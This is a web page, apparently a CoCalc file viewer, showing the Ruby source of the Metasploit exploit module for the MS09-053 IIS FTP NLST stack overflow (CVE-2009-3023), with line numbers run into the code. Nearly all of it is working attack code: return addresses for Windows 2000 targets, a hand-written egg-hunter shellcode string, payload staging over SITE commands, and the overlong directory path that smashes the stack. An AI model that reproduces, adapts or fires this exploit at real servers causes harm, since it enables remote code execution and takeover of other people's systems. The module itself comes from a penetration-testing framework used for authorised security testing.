CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/ftp/ms09_053_ftpd_nlst.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(update_info(info,12'Name' => 'MS09-053 Microsoft IIS FTP Server NLST Response Overflow',13'Description' => %q{14This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP15service. The flaw is triggered when a special NLST argument is passed16while the session has changed into a long directory path. For this exploit17to work, the FTP server must be configured to allow write access to the18file system (either anonymously or in conjunction with a real account)19},20'Author' => [ 'Kingcope <kcope2[at]googlemail.com>', 'hdm' ],21'License' => MSF_LICENSE,22'References' =>23[24['EDB', '9541'],25['CVE', '2009-3023'],26['OSVDB', '57589'],27['BID', '36189'],28['MSB', 'MS09-053'],29],30'DefaultOptions' =>31{32'EXITFUNC' => 'process',33},34'Privileged' => true,35'Payload' =>36{37'Space' => 490,38'BadChars' => "\x00\x09\x0c\x20\x0a\x0d\x0b",39# This is for the stored payload, the real BadChar list for file paths is:40# \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x22\x2a\x2e\x2f\x3a\x3c\x3e\x3f\x5c\x7c41'StackAdjustment' => -3500,42},43'Platform' => [ 'win' ],44'Targets' =>45[46[47'Windows 2000 SP4 English/Italian (IIS 5.0)',48{49'Ret' => 0x773d24eb, # jmp esp in activeds.dll (English / 5.0.2195.6601)50'Patch' => 0x7ffd7ffd # works for off-by-two alignment51},52],53[54'Windows 2000 SP3 English (IIS 5.0)',55{56'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032)57'Patch' => 0x7ffd7ffd # works for off-by-two alignment58},59],60[61# target from TomokiSanaki62'Windows 2000 SP0-SP3 Japanese (IIS 5.0)',63{64'Ret' => 0x774fa593, # jmp esp in ?? (Japanese)65'Patch' => 0x7ffd7ffd # works for off-by-two alignment66},67],68],69'DisclosureDate' => '2009-08-31',70'DefaultTarget' => 0))7172register_options([Opt::RPORT(21),])73end747576def exploit77connect_login787980based = rand_text_alpha_upper(10)8182res = send_cmd( ['MKD', based ], true )83print_status(res.strip)8485if (res !~ /directory created/)86print_error("The root directory of the FTP server is not writeable")87disconnect88return89end9091res = send_cmd( ['CWD', based ], true )92print_status(res.strip)9394egg = rand_text_alpha_upper(4)95hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0"9697# This egg hunter is necessary because of the huge set of restricted characters for directory names98# The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter99# The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order100# to locate the real shellcode. The only change from the original hunter was to randomize the101# prefix used.102103# Store our real shellcode on the stack1041.upto(5) do105res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true )106end107108# Create the directory path that will be used in the overflow109pre = rand_text_alpha_upper(3) # esp+0x28 points here110pst = rand_text_alpha_upper(210) # limited by max path111112pst[ 0, hun.length] = hun # egg hunter113pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers114pst[ 94, 4] = [target['Patch']].pack('V') # patch smashed pointers115pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers116pst[158, 4] = [target.ret].pack("V") # return117pst[182, 5] = "\xe9" + [-410].pack("V") # jmp back118119# Escape each 0xff with another 0xff for FTP120pst = pst.gsub("\xff", "\xff\xff")121122print_status("Creating long directory...")123res = send_cmd( ['MKD', pre+pst ], true )124print_status(res.strip)125126srv = Rex::Socket::TcpServer.create(127'LocalHost' => '0.0.0.0',128'LocalPort' => 0,129'SSL' => false,130'Context' => {131'Msf' => framework,132'MsfExploit' => self,133}134)135136add_socket(srv)137138begin139140thr = framework.threads.spawn("Module(#{self.refname})-Listener", false) { srv.accept }141142prt = srv.getsockname[2]143prt1 = prt / 256144prt2 = prt % 256145146addr = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}"147148res = send_cmd( ['PORT', addr ], true )149print_status(res.strip)150151print_status("Trying target #{target.name}...")152153res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true )154print_status(res.strip) if res155156select(nil,nil,nil,2)157158handler159disconnect160161ensure162thr.kill163srv.close164165end166end167end168169170